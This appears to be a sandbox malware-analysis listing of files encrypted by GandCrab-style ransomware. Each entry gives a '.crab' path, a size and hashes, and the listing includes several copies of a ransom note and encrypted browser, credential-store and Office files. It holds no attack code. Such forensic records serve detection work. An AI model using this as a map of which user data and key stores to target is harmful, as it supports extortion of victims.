c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
False
c:\system volume information\spp\onlinemetadatacache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_ondisksnapshotprop.crab 1.37 KB MD5: a5eb4c535cc662a1d10f3254bb0ac041
SHA1: 4de5295eb104c407346b6be37bd95d3db3b6cd17
SHA256: 48f00be28d5a77c2dc6b939f7b99c7e3c9087cf4c4116cc94b422f0f89ff4207
False
c:\system volume information\syscache.hve.crab 256.51 KB MD5: d9b0352752e8fe3d577c5929b32794f9
SHA1: cffedb3b8bd0148fd50c9a1046dbba5b6dc97c58
SHA256: c3b96263c67d8319aca3d9dbeb8b9e420c16c8b1fc62304472435ef4e92920b9
False
c:\system volume information\syscache.hve.log1.crab 41.51 KB MD5: 59bc9e31a0428eabc39dde171d5fbd7e
SHA1: f61d231388feded7a422e853a37d587aaafb0147
SHA256: de90c4d5d534b2e82cce7e12ed3a8af9d7765508a7bf703e6ddcc908a289aba0
False
c:\system volume information\tracking.log.crab 20.51 KB MD5: 61c09867f8af19edf74b9b5e45d3b1d9
SHA1: 8502152abd6f9cbb0f92264a1f46858d26ac8c36
SHA256: 0ec11cbe929329634047e4f415436899189677e09323639dabe9d1a25012516e
False
c:\users\aetadzjz\appdata\roaming\3i-ldvlh0.ppt.crab 72.10 KB MD5: 4e611e186b1636943c1654eb0cc32122
SHA1: 8cf88d5fb3f94511251fe3ba0647221414391d49
SHA256: 1305598c574ec0e82497d5a406cbae40a54d828b9b0af632f414b78b3e0d8aa4
False
c:\users\aetadzjz\appdata\roaming\4ewporeka.mp3.crab 17.18 KB MD5: 9e7f4497818cfa685399a175227bd7cc
SHA1: 1a2c8640d0dc0878e6c7ba3354131844325eabc5
SHA256: 5b0b74cc614be61fb404f20032bcef210b7330c0ab1ab235606d0207bec0fba1
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\javascripts\glob.settings.js.crab 0.52 KB MD5: a2f1b7a00369045dbc51a56e10974ce5
SHA1: 3ce730cd831254e5730c371cf74900fafc42ff1d
SHA256: 4ce2a8c7d9867a9dca98be401e10af28a33c197f9f351b75d743618114ac2b6f
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\addressbook.acrodata.crab 5.79 KB MD5: d2573f49d84c8b7902d27d679a2f4b38
SHA1: 4123aff4631edeb48dbdda4a83064a8eafd086d6
SHA256: b794679eb3f4ad8bff9e72765cc61a9aef81a77b61c0a117d37f07891edd743e
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\48b76449f3d5fefa1133aa805e420f0fca643651.crl.crab 1.43 KB MD5: b40f87a82b26222445ecaddc6c02dc4b
SHA1: 97b571f632242ba60cabab6c193baa475d654d7f
SHA256: 88d0f80e755ec4f4bdcbf15f4ee4d893fc65cef0256547cc99c8943bd2c6029d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\a9b8213768adc68af64fcc6409e8be414726687f.crl.crab 37.34 KB MD5: 543041fa9e4f820209b3561b1a81107d
SHA1: d010ecf6383ee72e3aeffb6af0d6c1e02c1f4822
SHA256: f132ef918163e88070073c1673a8510360d4b4886d6446d02c8410d989c6c250
False
c:\users\aetadzjz\appdata\roaming\cnxo4ofz-2lw.bmp.crab 82.35 KB MD5: b9f5f0c879e0782aaabcbddae0dbb8fa
SHA1: 043da47bdd302ba7090b4c87fd1a90a4e24f1ab8
SHA256: 43805751c0d7f8f35b1dcf37988aa377befb4257004f7d012515388d29df0bac
False
c:\users\aetadzjz\appdata\roaming\e xzj_-0mte61j1y7.png.crab 40.34 KB MD5: 3527f64f4d40222161e004a52f6f52d7
SHA1: 4e50834a02df9b6724011bc1a22820cd259a0752
SHA256: cb86435f05fd335d53ebf359c640b5abff13703dcd821f6783487a0772cafe75
False
c:\users\aetadzjz\appdata\roaming\ep00vf8facu03ctbnmff.odp.crab 84.91 KB MD5: e38cb85d94d03b3468ed2ed87abb959c
SHA1: 5a7e46fa913b95aae5fc136246dbb90481341a37
SHA256: 76ca7ce6f71d86c55b0dad027b708f801fed6b52016e664b444478c3d95cd234
False
c:\users\aetadzjz\appdata\roaming\esgmrbyfuxknpc.jpg.crab 35.12 KB MD5: b8f564643696fea1461240c955d25fb7
SHA1: 99991dd846f9a3b2332e893ce7102a2502384df6
SHA256: 0b94bcb236dd27888b1065015737385660ca555c3d575f404645c1ac9b311b22
False
c:\users\aetadzjz\appdata\roaming\fxtvw3asn.jpg.crab 85.05 KB MD5: 1996410adfeef9d298f817c6a5941969
SHA1: 7c192a5ae7517676a7ac6502bca2d5768352c91e
SHA256: 7a2082eb59643a90a336837503a75599a559be32082a381e2b5dff2d0ab8cf83
False
c:\users\aetadzjz\appdata\roaming\gvkrgagp6w1l2hzuog.gif.crab 81.71 KB MD5: df0e728cf2d11b59a2346d2a2ecd1556
SHA1: 71170e501ecc6f263cff596ed1802bef4e9de215
SHA256: 96c80464da76d624eeccec347889a14cf825309f281b97c7892e9d99e163426c
False
c:\users\aetadzjz\appdata\roaming\h0cbvpng ittdsph.jpg.crab 57.52 KB MD5: ab8220ad9601a9d618ba1299cd965142
SHA1: 1bd928543c12d0abb6a74abc60abd7b0bc96bd3d
SHA256: 4bdab5129200312e71d0799719ac57c3c4ea6a87117726411f44f45412de778c
False
c:\users\aetadzjz\appdata\roaming\hoow2yzez.wav.crab 100.49 KB MD5: 19eb469de685db066f54db82289ce8bf
SHA1: 406e39ffbad59555f58dc5b1894b1776b1775e5c
SHA256: d4443c235f42e869f3b0e98b4193ea2b1f74a4f7ac2f98ff915e83ebcdf8b06f
False
c:\users\aetadzjz\appdata\roaming\kdtlh1.png.crab 87.96 KB MD5: 3333bcbafb82b2d11ac6c257f7b1c714
SHA1: f7587a444fbffb3e6dba4b53d2fdd03d6f8d868e
SHA256: 195f38d62081637b9354a227958eb89d856cdd78194c7924ea6f7eda90471810
False
c:\users\aetadzjz\appdata\roaming\lzvkkvrkztf.m4a.crab 30.07 KB MD5: 1a4c07b6e1a8e2a78eb10709082ee20a
SHA1: aff698e91b1e98e5ce97e4bb9d24d69cee31fc0a
SHA256: 51792521c3545a1910639e729adc75b9725e600516025b2dac43ac8260b17e27
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 0.80 KB MD5: c3a2ca768b82a4208abb05e2f849f3b0
SHA1: cedc07f526ff8c8c6517264ffbd493ecefea6993
SHA256: 66ae511b4016a83b7f346a3969247965954e0cc7b2c6603ce690dee9a0f5db62
False
c:\users\aetadzjz\appdata\roaming\microsoft\access\accesscache.accdb.crab 196.51 KB MD5: 83e01baabe1d24be8ee7e44fe2b0e5a7
SHA1: 630a672ed3a86bbd0b33b6c5c1395e8d7fc75f8c
SHA256: a19b638b87ab18f28c08a7bb48374a89f019cb8d895e556e218641f21b7654ee
False
c:\users\aetadzjz\appdata\roaming\microsoft\access\accesscache.laccdb.crab 0.57 KB MD5: dd45a4ed4c12eca10516b2573309390f
SHA1: 997085273854e456c7b98b408a36de6014beea66
SHA256: 64e8ea17bd6c0e03a270352e649ff5d3aacd8024bbe96389b620db84aada1c8c
False
c:\users\aetadzjz\appdata\roaming\microsoft\access\system.mdw.crab 124.51 KB MD5: 7d2e6d8ab629fd1bd233e9bd2cfad485
SHA1: caf51878624b75ccd8e3d000244919faa38c598a
SHA256: 056e2bf8ef8444d857913932bf98ee1e7a54d51418f4a01da1059f79ac51dd01
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab 326.30 KB MD5: e8c6dd0c3b57326284175319439e874a
SHA1: d599e8559b4868f0836da7800f08d0e1cceb32fd
SHA256: 6d10e82c72203267144d22c2772923f4203eab637930c352a1cbfce0af4159cf
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab 290.57 KB MD5: 840dd2570808df82f827898534d2727f
SHA1: 40b32177ad4690818002f7309e714028045a8f0d
SHA256: 514dc8fb57408d8bf91023c1b32c21e45f852bb42a5d8493e850d4e56c8f25af
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab 262.88 KB MD5: a6f10e1dfac104352dfb6523dedfdafe
SHA1: ece079bc00b3e99c5fd8ce8084b42239be3aedaf
SHA256: fd65bfaccc8ad5136b53376cf069bfb89ee733981f370b7e3590f1c908434d90
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab 250.87 KB MD5: 56924c9f46136da2f0475820297879f8
SHA1: 9272d69b791b19874b10dc995692e8295f4db05f
SHA256: c2f696b04a128172121f0d6b22363323e7b3ac2781354610c42b67b08a9d7f66
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab 246.07 KB MD5: 6e578e7032f9427b6d15fca5abf8d5c6
SHA1: 42d51d4966cab2341aeef40bbaca6757414e83d8
SHA256: c1999637137aa004cc1dcf81d7e117fe8ffc5fbb352126e7170fba32a51f3a2d
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab 278.65 KB MD5: 87c39385a5c71e397fe6b87181eec239
SHA1: 55394439c68dad6bf7178c6be6c24939a57cda6e
SHA256: 7252e16942092cf4a62c350d1890cfb68f1ac463336b2e43321b01b7e881d556
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab 288.13 KB MD5: 12c50d03a674e5cf1dae5cbde6e41a34
SHA1: b6f1f960620a1d84d55d3b82ac5269490d3e8d6e
SHA256: dea0e5e5f6a6cb860069707ff591afcc5d6795deaad78730306e5e202d32ac86
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab 264.82 KB MD5: 69d4305d20275cef03d058a8c286025b
SHA1: e613a0c5d2dcce7254bc39a7345c0c3cd81491e7
SHA256: bc99235e148bc014c706b6f36d75bfe0a67e97862f5222447e40bc87335d6424
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab 212.99 KB MD5: 4e2dcb52b94b196d2fc6af6e01ff86f4
SHA1: 5cee436659308aaffa74e7992d4bf7e41e18c05a
SHA256: 57eeb15b9f8172d798fd9d37df3052195bf55ba6887082335469eb08a8b011bb
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab 249.76 KB MD5: b46c8527898c28f16ac175069ffa7364
SHA1: 3566668a857ff1990fd4357516b4a6d5695b7e7d
SHA256: da1b7efade15ceadb5a84bd109e76ebbe0128d912c79750497bf121640dcbdf5
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab 245.96 KB MD5: 753293421402c5b018a4a1d1fce36b4a
SHA1: 0134d7754a8980e9fa4ce066df1c897204c231b8
SHA256: 7deb572d26ba6b76d2151b72092dd1ebb8e912951df09dae9bcbeaa62a255d6b
False
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab 337.10 KB MD5: 7a83d5f49fc2a85682aa4ade5ce6685b
SHA1: 94a17283ee65f9b6df94999db88feea0610f634a
SHA256: 66a36cdec54e88c9b4645ed6555298082bd2e4fde177949afbe5a909f7933918
False
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0.crab 0.55 KB MD5: cbdc295e882f5ecce15ff078cb00c788
SHA1: f52b18e464b6329e1786d07f529459cabaf32598
SHA256: b71a07b8682b291c5df197d4055e3057823086312f09a5853f63078c94244ee6
False
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0.crab 0.57 KB MD5: def54c3f31956753d0f65bcbe5a1991c
SHA1: 516dd25444ce082e6430a527d842173dfdd7c685
SHA256: b53a3c5247e3ef5f4dc8d6199dfc84e1df90d033109edf7ba1eeaedb49ae3ebb
False
c:\users\aetadzjz\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab 3.53 MB MD5: c83bfe319b83d350a073bdb0ae9deee7
SHA1: cae80a27de3713aa7a9b037a8e3585993dc5f42b
SHA256: 885bce5b3bdd749ceaaa189aabb4cd6a2299a6611ecf4fdc785ef5bd5ba57c80
False
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\index.dat.crab 32.51 KB MD5: 1b8fa9ea6d55e65bcddc60b43eda0c6b
SHA1: 19b057fafbca7e75338d758aae5fbfea05c49e33
SHA256: e427836ada847f9e2a92cd4c6c78b3afbdc55029d8d2a25a00e570b9f55add5c
False
c:\users\aetadzjz\appdata\roaming\microsoft\ms project\16\en-us\global.mpt.crab 1.21 MB MD5: 8770d733cc8696aada433e7917ea77a3
SHA1: 1a78d6c20e852b6e5430c7f69d6667054b412b96
SHA256: 796d2f944160e95d35319af46ea929c540cba70c569599c8f742488f7c85ea5a
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\mso1033.acl.crab 37.37 KB MD5: dce616b8ff6b48bb9f94ff068b0403a5
SHA1: a2a36f5164b12379831118da04c595a1fcd2577e
SHA256: ff95fbf04d8a465cda063d9214026dfaa8348440eafd6fd45a5ad1f37f9ef05f
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\database1.lnk.crab 1.52 KB MD5: deabd417da7459c41dc2a0647db48b57
SHA1: 4dee68ecdfb146c9a5100451619b4c1b6fc645a8
SHA256: 3aea52b1fad9f9b42a5722cf4a064aa50dda1ef5ecc634a7a0ca00d115b6419f
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\faith's resume.lnk.crab 0.98 KB MD5: eadafcf1f3e1850f594984d067a3590a
SHA1: 3f93bbf1a8dfefa0052b031db0b315b67356df49
SHA256: f44162a5821ee0fbdaa00aa221c866f6f430b7ce7fdfd30419e203c6a16d6f66
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.88 KB MD5: 78fedaa2d42cd74d1354c84c9864774a
SHA1: 0df32d29a7aae9d723a858809f654e42b6a2d160
SHA256: 7c503b31191a9082c23d6e8373c34fe71ba7cc93045701c78d770cf725a12bdd
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\index.dat.crab 0.65 KB MD5: 3d5bd7cc365fa9fa0db9e1465068cbd4
SHA1: e687e8708130a8e23a785339f54f02eccac89276
SHA256: c7eb6e4d7e69af57e6daaa226f83c585c1e173ed5e1d36e4c27a99d912eb6815
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\my documents.lnk.crab 1.38 KB MD5: 6f6af7b7b6f71a3deecfb0aa8534a094
SHA1: b858e545503e0c2399fa2b97a44926540176f00e
SHA256: d784af558fc660adbfe7b36d47d7596c0ae8d5eb93d08f21a0c7deab75db9abf
False
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.59 KB MD5: de09ea743b43e6e8a06601fdc68cc7bd
SHA1: 0b1817a0e2816d2d35b508450d32838ee42c5820
SHA256: 38b09abde8a78a828416b3cc9ecb210db1cec1867810ec609a4bc16f4dce5e32
False
c:\users\aetadzjz\appdata\roaming\microsoft\onenote\16.0\preferences.dat.crab 5.57 KB MD5: f9e38c0ab6d4f4fbb5f3a252fb5fa348
SHA1: aacddc922d4e30a72c789266d420af8e61b48d13
SHA256: 8d58ac7f9be14dd213c5013e22c78d5e42a90c26e5b2885c1b6d6fcb3b66b13b
False
c:\users\aetadzjz\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: 0e7fa7461a79df201dbea938adb258dd
SHA1: 4810c36fa8b7cf5583f17757746d803602baa258
SHA256: 0df84ca6676083d2112dda7c8bebd0f13c23386d8e5756b9febecd4a70b84f6b
False
c:\users\aetadzjz\appdata\roaming\microsoft\outlook\outlook.xml.crab 1.09 KB MD5: a3fd16fc76d3ea86b19001a805f9f33e
SHA1: 9a3dd1e80897c816f81e07b845c30c720a9a9309
SHA256: 082310fbe0ca73d1e0d9cfc6ba1f8825c9b35f8d6196eb4afa2a494fcea39c51
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\credhist.crab 0.68 KB MD5: 3778355f29ba981271b3eb5cebd2d94e
SHA1: 410faf9f85aaa1529d9339bf665a4160fc3b8027
SHA256: 134049dad67e6b835b8933e02aee69a988420615b88f225829d6312ab2aa61ce
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\1862f3be-4467-4925-a93f-badcfb2203ba.crab 0.98 KB MD5: 43be25b8e81af3a4c3a70559b7f7c07f
SHA1: c8c93dfa4721449f0f4b6cd65970198ee98d5a4d
SHA256: 38dc2878ce53b1ababe9eb854dfa872cacaccb977d067fe255dc5e23af5100fd
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\8d3ed5bb-9674-4045-8be3-b9270b93e90b.crab 0.98 KB MD5: cbd4e534c70631bf3bc970fd1728c038
SHA1: da4cb27a145ff4278604afb579b837ec410131fc
SHA256: e4100c57de0a54c3964cf6ccfe5caa89893b18b576c94b7454e885101109e619
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\e9d127d6-64ac-4353-96d2-c19aaf9f738b.crab 0.98 KB MD5: b69f7548c10ca1ae9f3bb0e48f7dbced
SHA1: 789817f537afc0ef38551f680a435bdbc6aa750c
SHA256: 0d64a8e26ba46ab945a857ba275142050474923b6e460a7c30c96ddc4f4927f5
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\preferred.crab 0.54 KB MD5: 443fbfc6ad5734921d2e517f86fa6237
SHA1: b7af2b98d2e6122861be35581bfd28cc9cb6c5d1
SHA256: 667d7a9af9308adc9b68fe061ede8ab74adba2b28cd58c016f6edd8cddc7e94a
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.crab 0.98 KB MD5: a268ec9963245f209311104d34720def
SHA1: 117c8f1c338e62a329ebbef6f5117ce036bf216e
SHA256: 187754bc498cc3836abee867ac74f5fca3f85b513d1e17e108ff16c7a71e4939
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\preferred.crab 0.54 KB MD5: 5d29621e9d9100570fe0a80df7b674cc
SHA1: 261bce30f05a203db0bc7b33d4c7f63999109e0e
SHA256: 2bd509c6fd29a00d8a633faade9336f88a78f850f7ff11d83cc98d78115d09aa
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 09753e578dd1dd43a110ab1d555ed293
SHA1: 510dced2082b9c34dcff7937a1ee0e8408151a06
SHA256: 4ddff9363e6f3ce654406877f8ca21f047fff86cb54688f5438ef21eb93e7fc6
False
c:\users\aetadzjz\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: fc98c9026886d848cbcb775e0748fa81
SHA1: a4e479b62269999e4af7fda6521d4890e9f39690
SHA256: 09996890e3ab21f8e798ca15545c50838ffbce2837221b6a81dfe01b15e6cb44
False
c:\users\aetadzjz\appdata\roaming\microsoft\templates\normal.dotm.crab 18.85 KB MD5: 521b0b611a83e531564a27fd2a4b94bb
SHA1: 808f10c643859427346136ed5e77da5b33dab404
SHA256: 496d71d2be91172d4adb9059a8e5b639106a0c2afe6f65367247f5ffc8e0c0ab
False
c:\users\aetadzjz\appdata\roaming\microsoft\templates\~$normal.dotm.crab 0.68 KB MD5: 5a856257740303cc06a5fb748a781b7b
SHA1: f8e6eda7d040bda7a55d022aed2da09d5245f686
SHA256: 81c71388106707cdfe5a6543c12899298d86ff6830cbc7eecfc077add1012004
False
c:\users\aetadzjz\appdata\roaming\microsoft\uproof\custom.dic.crab 0.54 KB MD5: cbf283a0ebcd2161825f10f5b8f5b0e3
SHA1: 41f99b8e099e74cdbc6cdb5b9d11ce8953bb28c7
SHA256: d735b2b6be0b188bc6093d04da1bd9e8090fabbf0433bdcfb88ca5db0b9b8154
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332.crab 0.52 KB MD5: 60557587b1bd168d6c5148070ef7c69a
SHA1: 621dba77dee2dd115ad556f5778ad6bf152e78a5
SHA256: b117eadf0bb109085190b50b212e107a66d1aa12b55db70295011a0b3a5c4972
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\addons.json.crab 0.54 KB MD5: e32a1a18a955c9f2e0fb69cf7763eefb
SHA1: b8538f08379c030a9fc15087d68a84add105beba
SHA256: 192ab708d23aefec40db206dacea6cb201511a132655bd1cb53c4cb2855d1177
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json.crab 3.48 KB MD5: d0e8121dd41a12224a8eb59ded64ac97
SHA1: baae527e9b6559f7651281c46cfa6fabd76c2039
SHA256: e3dcd3a2564001e8e5ff629c0336db79bd3a4ead4a1c7e4c0574a0febeb45a99
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json.crab 3.48 KB MD5: d4af25f86aef30a2e8155a44f44b8a67
SHA1: d6a9b2512a1df3f9969155a11e6e991f7bf629af
SHA256: b1bf04d38bc4acb521f2b5c4b68d7f2a6683cece06098cb0633a952cb777e3a8
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cert8.db.crab 64.51 KB MD5: ff5e3d6b56dc5ddac3b31ea1683673ca
SHA1: 0ab053cec2d0fb496392e57be2ad3197d02c41e6
SHA256: 6cb468f648b3a06ab580e325025250c7b7b45ca534c3442c1a49008b634164ed
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\compatibility.ini.crab 0.71 KB MD5: 93b8d9391f8be571cdeeeb96eda5a880
SHA1: 94bfbf1817251273f8a3c6d9fd68a164d0ac452b
SHA256: 3021d337ff27bc9ce32027f1776d49cc7acfe8026d7034703116bf22ec72214f
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\content-prefs.sqlite.crab 224.51 KB MD5: fdecc9f490f265769a93ce4b3e291750
SHA1: 3b9a02be53efd397732b152e682263ea7c3146eb
SHA256: 498cd297123d7e8bc0d327657cef267235c15f5b28b6fe2c4b115de557a3990f
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cookies.sqlite.crab 512.51 KB MD5: 96f502286fe01464471fa721e79b39ee
SHA1: 1ecc4bd12af1087159a8e1428265f4cf87852740
SHA256: 05dc6622646f77cd392d5bf2f03380d1a31e3170d9e3ea59807a1641e5b1bf6f
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\downloads.sqlite.crab 96.51 KB MD5: d3d1fc8091c351ed5246e69e96586039
SHA1: cadad8f9e3c079303583bc2c13bfc07efe26133f
SHA256: 7dd1ff7403cd31f98228534359b695721043533341c3e77aa4ee5028f8c927e4
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.ini.crab 0.65 KB MD5: a22d1d653d36636db05d479c623cb0ff
SHA1: b4ff90a91c85fa1059fb71bfd90a7a9fa88c8808
SHA256: d6993f3732f069a65773c66302a992b68d01f316144a3c2150730e31268cbdd4
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.sqlite.crab 448.51 KB MD5: f0210b8e8e7e304e79a6b81783910e9c
SHA1: 7ef4deee048bcbb3a64c9c5f484a0394da8b9ddc
SHA256: 6ee6e2134cb6e7bad6cb6a2d0548e88cbf072ca8c1776c2d0dbe2e86ed793ef5
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\formhistory.sqlite.crab 192.51 KB MD5: 6a66e2d7a16101b2e6bb5c7c00b9d38e
SHA1: 4a89bc9b6780cdd968a5ff756d8c6b39f2e50984
SHA256: 536a27bca4b3b94372cbf4fe1ca566c1d48f94ad69424d6933d9d1e0ce65bdcc
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\healthreport.sqlite.crab 1.09 MB MD5: 5e02cf5bf85c34ed2cf2ecdedb38d993
SHA1: 91634954b5f53ec1b79c73b818867a9be676dea2
SHA256: a64660e42989748ece180533fd01e8117ce69383ff13952d8a5ca871568681c1
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite.crab 2.34 MB MD5: 8375d7f1ef1a7d4cb06ecedd33c8d313
SHA1: 914e57709204ad35f8d10e55584d9c5daa38771a
SHA256: bd0521a6b8b04163fac4f849a147c80c7a4005a5bf1e03c1ac70483a3c65859b
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\key3.db.crab 16.51 KB MD5: 3100664ed611c822e4a09640ad5e5faf
SHA1: e8656433471c0d9435739407e242578d08148a6d
SHA256: c1068b97b8916e15221cb4963d1d5c4342be007337467492bbc9ac2f51fb9405
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\localstore.rdf.crab 1.76 KB MD5: 25ce8c1dc67e94c5614e0c8e941fbea2
SHA1: 6741f9daf347e58239d897139c15d9cee52a124b
SHA256: 7e782e04a881cbec343ee5287672ec424066365f2db1bd4587d20fc1e585fe4e
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\marionette.log.crab 0.57 KB MD5: 1d7e2aefc2f4eaa7f256b4f921036959
SHA1: 669e93ef662595d311c25edc7bf77adea0ca179f
SHA256: 19d19c80e4d64a96dfcad182827cf5e938f65f8a8d8cab2b39507923710cfc8f
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\mimetypes.rdf.crab 4.26 KB MD5: 886194b9a89c68ba6a0e7f5fa091cee5
SHA1: 58c7fd2cc769bd1c75a636c185c18b37df351deb
SHA256: 11ad29bad88139e9e06c6c153191c1658872319cee3238255c8727f232ab1b24
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\permissions.sqlite.crab 64.51 KB MD5: f0e36e44bd01a99ffeff1c5d02a435e0
SHA1: d2266f13ab0c5a8bbbca3dfdfc9e5d723680438a
SHA256: 4ab2956c4e7789d2f4d1766d44e062f4ef7dd1cfb7338be125975fc8772651cc
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\places.sqlite.crab 10.00 MB MD5: 0bc17f32a242ef3d677ea37231406e77
SHA1: eeef5e6f8571379b9c9fb673ab0c4ec8e448c807
SHA256: bf3226cedb2b6e792e1a36302e2384dac3f00355128088695583ceea83d3ccf4
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\pluginreg.dat.crab 3.66 KB MD5: af6bec8e52cf75efe29b2ab8d261e4c3
SHA1: f0317078f73dbf0c5b7e8c3da83239e9b44699a1
SHA256: efc7e753703f0c8cde542779fb4988e6fefd542c8640647ee30dc5077a6a47ee
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js.crab 5.82 KB MD5: 853048b71697c93339f919f8bb120e63
SHA1: 0e3e71bda3d83ab407a0a0f02739b40ce08e23d1
SHA256: 9e76f482c03ba6fd54ef1cec9b4cc0475501f2ad26cdbd0ed3ea2728e16aa7f7
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\search.json.crab 16.90 KB MD5: 04768d4a94eef56d89b2d347a5741c1b
SHA1: 478bec2e5d4c3e33a45d53376df3b3ac23e550ee
SHA256: 23e2f74ae79de6656793abafabf22856fbc5cac7a8471a6690d71362adaefad3
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\secmod.db.crab 16.51 KB MD5: ba505d723e55fd50009a44dfbdc0146f
SHA1: 1683cf9f7923fc6b16c16ae315e1d2f18f1cfe22
SHA256: 2250a9096020c4da6d38d1d143263a930c8e7a2841712b875cf515d3441a8538
False
